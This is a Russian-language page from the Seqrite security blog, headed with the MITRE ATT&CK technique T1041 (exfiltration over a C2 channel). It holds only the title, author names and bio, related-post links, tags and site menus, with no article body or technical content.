T1041 Эксфильтрация через канал C2

 

Авторы:

Сатвик Рам Пракки

Картикумар Дживани

 предыдущий постЗначение Закона о DPDP для сектора BFSI
Следующий пост  EDR против XDR: понимание различий и выбор правильного ...
Сатвик Рам Пракки

О Сатвике Раме Пракки

Сатвик Рам Пракки работает исследователем в области безопасности в лаборатории безопасности компании Quick Heal. Его основные направления деятельности: Threat Intelligence, поиск угроз и написание статей на темы...

Статьи Сатвика Рама Пракки »

Похожие статьи

  • SVC Новый Stealer на горизонте

    21 марта 2025
  • Фишинговые атаки (квишинг) с использованием QR-кодов: как их обнаружить и предотвратить

    18 марта 2025
  • Разоблачение кампании GrassCall: хакеры, стоящие за кибермошенничеством при найме на работу

    6 марта 2025
Избранные авторы
  • Seqrite
    Seqrite

    Seqrite является ведущим поставщиком решений в области корпоративной кибербезопасности. Специализируется на...

    Прочитайте больше статей Seqrite
  • Джоти Карлекар
    Джоти Карлекар

    Я страстный писатель, которому нравится создавать контент о новых технологиях и...

    Прочтите другие статьи Джоти Карлекара
  • Бинеш П.
    Бинеш П.

    Я страстный энтузиаст кибербезопасности и преданный писатель. Обладая талантом...

    Читайте другие статьи Бинеша П.
  • Санджай Каткар
    Санджай Каткар

    Санджай Каткар — соуправляющий директор Quick Heal Technologies...

    Читайте другие статьи Санджая Каткара
Темы
склонный (25) Cyber-атака (36) кибер-атаки (58) кибератаки (16) кибератаки (15) Информационная безопасность (340) информационная безопасность (34) Киберугроза (33) кибер-угрозы (51) Данные нарушения (56) нарушения данных (29) Потеря данных (28) предотвращение потери данных (34) data privacy (16) защита данных (34) безопасность данных (19) DLP (50) ДПДП (14) ДПДПА (17) Шифрование (16) для защиты конечных точек (112) Безопасность предприятия (19) Эксплуатировать (13) GDPR (14) вредоносных программ (76) анализ вредоносных программ (14) вредоносная атака (23) МДМ (27) Microsoft (15) MITRE ATT & CK (13) Сетевая безопасность (26) фишинг (30) Ransomware (69) атака ransomware (31) атаки ransomware (31) защита от копирования (16) Seqrite (41) Seqrite Шифрование (27) Seqrite EPS (33) Seqrite Услуги (16) обнаружение угрозы (13) Threat Intelлигенция (19) UTM (34) Уязвимость (16) нулевое доверие (13)
Seqrite Labs

Ведущий поставщик решений по корпоративной ИТ-безопасности, упрощающий защиту конечных точек, данных и сетей с помощью лучших в своем классе решений по предотвращению, обнаружению и реагированию на угрозы по всему миру.

Подробнее о Seqrite

Наши соцсети:

Подпишитесь на нашу рассылку

Будьте в курсе последних тенденций и новостей в сфере кибербезопасности.

Загрузка
Продукция и Услуги
  • облако
  • Endpoint Protection
  • Endpoint Detection and Response
  • Mobile Device Management
  • BYOD
  • Extended Detection and Response
  • Zero Trust Network Access
  • Data Privacy
  • На Прем
  • Endpoint Protection
  • Endpoint Detection and Response
  • Data Privacy
  • Платформа
  • Malware Analysis Platform
  • Микро Бизнес
  • SOHO Total Edition
  • Услуги
  • Threat Intel
  • Digital Risk Protection Services (DRPS)
  • Ransomware Recovery as a Services (RRaaS)
  • DPDP Compliance
  • Managed Detection and Response
  • Кибербезопасность и Data Privacy Awareness
Ресурсы
  • статьи
  • Статьи
  • Даташит
  • Отчеты об угрозах
  • Руководства
  • точка зрения
  • Понимание Data Privacy
  • Диалоги ДПДП
  • Политика и соответствие
  • Лицензионное соглашение
  • GoDeep.AI
  • SIA
  • Час конфиденциальности
Свяжитесь с нами
  • Зарегистрированные офисы
  • Давайте поговорим о кибербезопасности
Поддержка
  • Техподдержка
  • Загрузка программного обеспечения
  • Автономное обновление
  • Обновление прошивки
  • Обновления
  • Документация
О Нас
  • О нас Seqrite
  • Руководство
  • Награды и признание
  • Новости
Сотрудничайте
  • Партнерская программа
  • Найти партнера
  • Стать партнером
  • Seqrite Сертификаты

© 2026 Quick Heal Technologies Ltd.

Карта сайта Политика конфиденциальности Юридическая информация Политика использования файлов cookie Условия эксплуатации